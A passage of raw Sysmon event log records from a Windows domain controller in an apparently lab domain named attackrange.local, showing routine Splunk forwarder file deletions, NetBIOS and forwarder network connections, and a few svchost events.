Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B8BBC339CA067FC7238CC80AC75114,SHA256=5B7B58EF7D7411D62EE7F5D4FDF13177C346F03FA40A7D93D2C2A519584BA040,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.198{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-663.attackrange.local138netbios-dgm 354300x800000000000000024638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:00.198{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-663.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x800000000000000024641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:03.797{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4047C8DB09BCD2370709C315E9AC804F,SHA256=2A822D5F2DA5984AD585F1D6D65A20E30549CFC61F807CE7C932314C45DBBD8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:04.797{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B082D4BDF94ADA59F7FC31C81BC7985,SHA256=A361DA4E92135F635DCEF6C09252B2DB52A217BFCFBE0F670074F592CFE83A99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:05.844{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53D3A6BDF60EA92CB472A96D2D7F1DE7,SHA256=5143941D6F288310884EF927AB25DECBC8CEA51D5A66D067A9B5A948D73C49D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:06.844{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85D0CE8BD02333B4AB2F1A8F81CB18A9,SHA256=A4F23EA2DEEA4EAC796306D56F54D6B050FA77A30EB66979DEC6493BF1D0F891,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:04.258{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61511-false10.0.1.12-8000- 23542300x800000000000000024646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:07.859{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A66AABAD5AFBB0F06EEC71C45EFB3E,SHA256=86E6429D0D1BA61CDA262CCAEBAC0E3A97D2B7B055680EF8AF367D1D15CC0B9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:08.875{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FA0E43B25BEF236834D034E8F927F9B,SHA256=4A252E14CABFB7650CFDDB48857815B37422F2BFB76B46BBD5D4247BF6FF48EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:09.875{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=543804470443691322321526EA5B7959,SHA256=401531FCF792DE3CDD072D930AE20C8D1579BA17F16E498C745DE0DDE8566AF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:10.883{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4D5A05CD7EE56F2ADF1FF5589140B04,SHA256=272ED5315676A4787B226A33F84C1C0901565C15DC7DBB909AFA6CFE1B08D929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:11.883{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CCB06D0E579817D756BDC1106197FDC,SHA256=49F87034A4989FEB5ED4DA0A483BF15B200C78F33B12BF0A8068506D8F8B5018,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:10.148{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61512-false10.0.1.12-8000- 23542300x800000000000000024652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:12.898{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BA5C8123893CF023B7817006FA75CCD,SHA256=CE6AC2D1AB3C48C4186C7606CA18810293C6B4B976D420A615979B8FD920E661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:13.914{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754B364EE577CAE31528ADF09ABB5CFA,SHA256=D195FA48AF2B393353179D79EB9BA56DB3ED5353CEAB41DBD9593E7FCD8F7D18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:14.945{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045116C:\Windows\system32\svchost.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:14.930{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CCF40759218BE898ADE05577604FCD2,SHA256=B4EE4FEB61AF2BC4EC63DDB5B38F6D89B91A6463DA452DC6A1DBE523C43A70EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:15.961{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B94ADB179597204694D35BFDF0D5A85C,SHA256=F05FFEC94A0D974C49C95D900A7612179083955533430FF87F6480D6C7563ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:16.977{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC40DE0E0206AD566047E279A9F25BFA,SHA256=0DF62618EFD30A93ADFA2E5D920F276C645F07BF99D576513492092AE3A76AA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:15.219{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61513-false10.0.1.12-8000- 23542300x800000000000000024659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:17.992{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=924D17AE635C027B0F0916692C7FE47E,SHA256=D1A368AAFBED9BE9388965E7595548E5B8B8AF085EBA103C3B4FBF12A6B08D02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:19.023{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A273E7D1BAA6EE11237ACE4D970E8304,SHA256=E4C1A888C5203C7010B2C4EACF4D08EE87ADB7102368ADA0D7120C6C6C4A2577,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:20.039{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=344A1652EF7DD42995ACADC42760391F,SHA256=A494EDE3A9615172E550146CC09847ADAEDB58714A44AB1F075FF78C78D0474B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:20.281{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61514-false10.0.1.12-8000- 23542300x800000000000000024662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:21.039{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F020336CCDF7C278E1D95DC991A209B,SHA256=DE787E7BD7E7AB9652F28870337AB229AEE95F9055019A237D20089B521992C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:22.039{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1374657F148CEB324692B54B962BA524,SHA256=3498F56EFF05080B16D9693232A407508642FC96D21399A437C350C0B010EB83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:23.070{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D1964E923F75552B71700DBCB33DCD0,SHA256=3098C92E05C5751707F29F64725314B9E8DDCD45BA6A7BD5A18C9895E7047E7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:24.086{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AD86D100F3E03634416ECDCE2D8855D,SHA256=4C3B7275182E524D2A096B0895B15BDC59375FE5033F6A226109CCC978DB9BF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:25.101{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=448B93DB9EA52D81493B94F77E4E602B,SHA256=2EF9B2DA1CFD74178F8651C4CD8E904D37DEAA29B9D50A09B8A69F140576F37C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:26.195{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=248B62149141432D15BD9D78027BF03E,SHA256=58A29691D8F4EFC65A13F4F19D1FCF5376765375EF6C8F377D9DF9400DF0BDD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:26.117{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E6764EA6B47C81C0250895B8FCB5350,SHA256=DE160C36B4519B72F8B316E4A5AD64CCD16138136FEB210F137BA195D7B730F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:26.250{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61515-false10.0.1.12-8000- 23542300x800000000000000024670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:27.117{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D7D4FF8EE1C72841BEFCE0D66DF1E45,SHA256=78662BDF92B54FADC77D40172941B6053216CA6A8EAE12A20CDE5161C4C8DC0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:28.148{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E21275741975DAA3BA8C91EF41312C97,SHA256=7FA42A7526A71EBB3DF2FE5CD2C089E8E89E227CA463EBEF69D519169F61E9CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:29.195{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F50B77CF21FABBD8D4D42F800EDE2DFB,SHA256=B2E52A1A172D3AD99876487098AFFCBBF7DE53CD60A63E9F2AE22A833827BA4C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000024675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:09:30.474{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d76874-0x0ed196ae) 23542300x800000000000000024674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:30.226{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53D491D7A43E59430C5E234D4386CB8D,SHA256=F8823AE6674F70663A62E8D53C0C374F69C19706066F16DCD1FB602664A7EB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:31.256{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF9E63EF82FA3866E3E2EA80E0799148,SHA256=AF53265E141BA67DA812C74E66E12C2372BBAE577E1987E4FFD0794BDA38CF9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:32.287{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC3D14598314E1ABB67ED261C4F4DF87,SHA256=8CACBD757EC3AE200DE2CB3627C9661CA1F0A19325EABD85BA51C1ABF8A8892D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:33.334{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D08F00F9C0E13779B1A80CC1B64EB5B,SHA256=E6BCD8021AC8AC7A9A5105C8C23411A2054730DE40267C5D8FF6E64402ED2944,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:32.185{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61516-false10.0.1.12-8000- 23542300x800000000000000024679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:34.334{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ED929901ECC02A58B2127F3CEE89F14,SHA256=B9688C876188EC6801AD86C85BE54DC681F737781D4112AB18B68745D22AB35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:35.349{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1E6091C9D4F063711ED0BD0A57A83D,SHA256=8E0EB3C3618E74142884D122E1534E0C9BBF7F775233A86CCF65798B7B7EF18A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:36.349{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F9AAB3D69E098713FC0A44BA4C732FC,SHA256=839FB53B014F440E04C4B84EAF63857744A8CB11A2474509B1C0B7908E6FFF3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:37.381{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C15E31BA6354D5802B8502255D32B4FF,SHA256=5A057AED385B18739123354A3B0D92F49849779D3CA8945D3BE57163BEF6C228,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:37.216{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61517-false10.0.1.12-8000- 23542300x800000000000000024684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:38.396{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B66158C0BD6ADA79163FFEC9EC9CF525,SHA256=8033D8AC62B4E2F1CC021875AA5DF60BA1102AF1E11C391D9A3AF71D6EC1D5EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:39.396{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=972B25F9C07CF769DD274B352A192008,SHA256=8586D6249A8D4E85D7010561A3311E954CD06EE809D5666DD758BDDA29914AEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:39.224{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:40.412{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75D41C3A6A501BC86CF18956ED6BBCA3,SHA256=9ECD9E990FF726A1793C9B3D5933FF1CCE62E14369137420A4CCA84B87DFD6D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:41.427{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A55581860681C1ED900311B51B2CD32,SHA256=AECD93EF6FEADA2A48ECF44135286776F254941090BBA33E21808A48A81E7F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:42.443{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A420E2564C94992A09DC21F2D6742F1,SHA256=FD366E5073DAF5212724ECB6E03704ECD5A2C152C9F7D445C8E4FCF654602FA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:42.084{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 